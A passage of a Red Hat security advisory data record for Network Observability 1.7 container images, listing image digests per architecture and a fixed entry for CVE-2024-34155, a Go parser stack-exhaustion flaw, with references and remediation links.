"network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", product: { name: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", product_id: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080?arch=arm64&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", product: { name: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", product_id: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", product: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", product_id: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", product: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", product_id: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", product: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", product_id: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9&tag=v1.7.0-67", }, }, }, { category: "product_version", name: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", product: { name: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", product_id: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-operator-bundle&tag=1.7.0-86", }, }, }, { category: "product_version", name: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", product: { name: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", product_id: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", product_identification_helper: { purl: "pkg:oci/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134?arch=s390x&repository_url=registry.redhat.io/network-observability/network-observability-rhel9-operator&tag=v1.7.0-67", }, }, }, ], category: "architecture", name: "s390x", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", }, product_reference: "network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", }, product_reference: "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", }, product_reference: "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", }, product_reference: "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", }, product_reference: "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64 as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, { category: "default_component_of", full_product_name: { name: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le as a component of NETOBSERV 1.7 for RHEL 9", product_id: "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", }, product_reference: "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", relates_to_product_reference: "9Base-NETWORK-OBSERVABILITY-1.7.0", }, ], }, vulnerabilities: [ { cve: "CVE-2024-34155", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:06.929766+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310527", }, ], notes: [ { category: "description", text: "A flaw was found in the go/parser package of the Golang standard library. Calling any Parse functions on Go source code containing deeply nested literals can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34155", }, { category: "external", summary: "RHBZ#2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34155", url: "https://www.cve.org/CVERecord?id=CVE-2024-34155", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34155", }, { category: "external", summary: "https://go.dev/cl/611238", url: "https://go.dev/cl/611238", }, { category: "external", summary: "https://go.dev/issue/69138", url: "https://go.dev/issue/69138", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3105", url: "https://pkg.go.dev/vuln/GO-2024-3105", }, ], release_date: "2024-09-06T21:15:11.947000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", 